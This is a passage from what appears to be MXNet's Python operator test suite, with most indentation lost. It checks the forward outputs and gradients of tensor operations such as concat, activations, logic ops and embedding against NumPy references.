shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_context(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    # sign() has zero gradient everywhere, so the expected input gradient is all zeros.
    npout_grad = np.zeros(shape)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
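    # Analytic gradients: d/dx rsqrt(x) = -1/(2*x^(3/2)), d/dx cos(x) = -sin(x), d/dx sin(x) = cos(x).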
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
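    # maximum() routes the gradient to the larger input and minimum() to the smaller,
    # so each input receives the out-grad wherever its mask is set.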
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
